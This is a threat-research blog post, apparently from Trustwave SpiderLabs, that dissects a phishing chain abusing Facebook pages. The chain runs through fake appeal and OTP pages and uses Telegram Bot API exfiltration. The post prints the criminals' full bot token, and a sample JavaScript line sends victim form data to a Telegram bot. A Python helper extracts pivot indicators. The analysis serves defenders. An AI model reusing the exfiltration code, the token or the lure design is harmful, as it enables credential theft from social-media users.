SpiderLabs Blog

Meta-Phish: Facebook Infrastructure Used in Phishing Attack Chain

Meta has two of the largest social media platforms today, Facebook and Instagram. These platforms became the modern gateway for people not just to socialize and eavesdrop on the lives of famous personalities, but more importantly, to stay connected with their friends and loved ones. The sites also became effective channels for organizations to advertise and disseminate information. However, their global presence has made these social media sites an attractive avenue for cybercriminals to perform their nefarious deeds.

Trustwave SpiderLabs previously released two blogs about Facebook and Instagram phishing. The common denominator between these two articles is that we discuss the use of phony notifications which lure victims into thinking that they have allegedly committed a violation of terms. The victim must then make an appeal through a crafted phishing page to avoid losing access to their account. This social engineering tactic is not new, but cybercriminals are constantly innovating, creating ever more sophisticated ways to evade security controls and filters.

Recently, we came across another example that operates in the same vein, which we have dubbed Meta-Phish. A successful Meta-Phish attack could result in the loss of Personally Identifiable Information (PII), login credentials, and Facebook profile link.


Figure 1: Phishing email message

Instead of the usual phishing link to an external landing page, this mail sample is crafted with a link that points to an actual Facebook post. The content of this Facebook post appears legitimate because it uses a dummy ‘Page Support’ profile with the Facebook logo as its display picture. At first glance, the page looks legitimate, but the link provided in this post leads to an external domain.


Figure 2: Dummy ’Page Support’ profile page

The link in the post leads to this main phishing URL, hxxps://meta[.]forbusinessuser[.]xyz/main[.]php, which mimics Facebook’s copyright appeal page.


Figure 3: Fake Facebook Copyright Appeal page

Upon clicking the send button, any information entered in the form by unsuspecting victims will be sent to the cybercriminals, along with the victim’s client IP and geolocation information. Let’s look at the source code and see how this attack unfolds.

Inspecting the source code of main[.]php reveals a link to a JavaScript file which contains the function that will retrieve any information provided to its form when triggered.


Figure 4: main[.]php source code


Figure 5: index[.]js source code: Form value retrieval

Then, all the information retrieved will be sent to a Telegram account via a Telegram Bot API.


Figure 6: index[.]js source code: Telegram bot API call

All queries to the Telegram Bot API must be served over HTTPS and need to be presented in this form: https://api.telegram[.]org/bot<token>/METHOD_NAME. From here, we can identify the unique token of the bot used in this attack: bot5213906361:AAEAYFxbgjU7aBqrUm3ufkkt8UybZP_Lnbo.

Index[.]js also uses an external site to harvest the victim’s client IP address and geolocation information. This information is likewise sent to the cybercriminals via the Telegram Bot API.


Figure 7: Index[.]js source code: client IP and geolocation harvest


Figure 8: Client data harvested

Finally, the user is redirected to the next page checkpoint[.]php.


Figure 9: Index[.]js source code

On this redirection phishing page, a fake One Time Password (OTP) check takes place.


Figure 10: Phishing page with OTP request

Based on the code, any value that the user tries to input will only lead to an error message. However, the code also contains several functions that set a countdown timer for the user to enter the required OTP.


Figure 11: checkpoint[.]php source code

If the user tries to click the option ‘Need another way to authenticate?’, a message box will appear and provide some steps on what to do next. However, if the user tries to click ‘Get Code’, it will redirect to a legitimate Facebook site that requires a log-in.


Figure 12: ‘Need another way to authenticate’ page

The source code of checkpoint[.]php also reveals the use of Google Analytics with the specific ID: UA-177207786-1.


Figure 13: checkpoint[.]php source code

Google Analytics is a web analytics service within the Google Marketing Platform brand that tracks and reports website traffic.

The property ID is the identifier associated with the user account and is used by Google Analytics to collect data. The UA prefix stands for ‘Universal Analytics’, which is the current version of Google Analytics. The numbers that follow are the Google Analytics account ID. The postfix number is the index number of the property connected to the account. It is possible to have up to 50 properties connected to the same Google Analytics account, so the postfix can be from 1 to 50.


Figure 14: Google Analytics ID Structure

The Google Analytics property tracking ID can be used as part of the Global Site Tag, which is provided in the admin area of the account.

Looking up this Google Analytics ID in VirusTotal returns several Facebook phishing URLs, which makes the ID a useful pivot for threat hunting purposes.
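The two pivot indicators discussed above, the Telegram Bot API token embedded in index[.]js and the Google Analytics tracking ID in checkpoint[.]php, can be pulled out of captured kit source automatically. The following is an added example written for this post, not code from the phishing kit or from Trustwave; the JavaScript and HTML samples are constructed, the bot token in them is a made-up placeholder of the same shape as a real one, and the function names are assumptions.

```python
from __future__ import annotations
import re
from typing import Optional

# Constructed sample of the kit's index.js; the bot token is a made-up
# placeholder with the same shape as a real one (bot<id>:<35-char secret>).
SAMPLE_JS = """
var api = "https://api.telegram.org/bot1234567890:AAEconstructedSample_Token012345678/sendMessage";
fetch(api + "?chat_id=" + chat + "&text=" + encodeURIComponent(formData));
window.location = "checkpoint.php";
"""
# Constructed sample of checkpoint.php carrying the Global Site Tag with the
# tracking ID reported in the post.
SAMPLE_HTML = """
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-177207786-1"></script>
<script>gtag('config', 'UA-177207786-1');</script>
"""

# Matches plain or defanged api.telegram.org/bot<id>:<secret>/<method> calls.
TELEGRAM_API_RE = re.compile(
    r"api(?:\[\.\]|\.)telegram(?:\[\.\]|\.)org/bot(\d+):([A-Za-z0-9_-]{35})/(\w+)")
# Universal Analytics tracking ID: UA-<account id>-<property index>.
GA_UA_RE = re.compile(r"\bUA-(\d+)-(\d{1,2})\b")

def extract_telegram_bots(source: str) -> list[dict]:
    """Report Telegram bots used for exfiltration: numeric bot id plus the API
    methods called. The secret half of the token is deliberately dropped so the
    finding can be shared without redistributing a working credential."""
    found: dict[str, set[str]] = {}
    for bot_id, _secret, method in TELEGRAM_API_RE.findall(source):
        found.setdefault(bot_id, set()).add(method)
    return [{"bot_id": b, "methods": sorted(m)} for b, m in sorted(found.items())]

def parse_ga_tracking_id(tracking_id: str) -> Optional[dict]:
    """Split a UA tracking ID into account id and property index (1..50)."""
    m = GA_UA_RE.fullmatch(tracking_id)
    if not m or not 1 <= int(m.group(2)) <= 50:
        return None
    return {"account_id": m.group(1), "property_index": int(m.group(2))}

def extract_ga_tracking_ids(source: str) -> list[str]:
    """Distinct, well-formed UA tracking IDs found in the source (pivot keys)."""
    return sorted({m.group(0) for m in GA_UA_RE.finditer(source)
                   if parse_ga_tracking_id(m.group(0))})

if __name__ == "__main__":
    print(extract_telegram_bots(SAMPLE_JS))
    print(extract_ga_tracking_ids(SAMPLE_HTML))
```

The bot id and tracking ID returned here are the values to search for in VirusTotal or in proxy logs; the same regexes work on defanged indicator lists.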


Figure 15: Sample screenshot of VirusTotal search result using Google Analytics ID

During our research, we also discovered several other phony Facebook accounts that use this social engineering technique:


Figure 16: Fake Appeal Form page



Figure 17: Fake Account Restrictions page



Figure 18: Fake Social Network Violations page



Figure 19: Fake Page Recovery Notifications page


The majority of these URLs use free web hosting sites or URL shortening services that redirect to the destination phishing site. Some sites also use newly registered domains that are affiliated with neither Facebook nor Instagram.

These types of posts or pages can easily be found by searching specific keywords such as ‘appeal form’ in Facebook’s search text box:


Figure 20: Text box search for Appeal Form page


To wrap up, these fake Facebook ‘Violation’ notifications use real Facebook pages to redirect to external phishing sites. Users are advised to be extra careful when receiving false violation notifications and not to be fooled by the apparent legitimacy of the initial links.
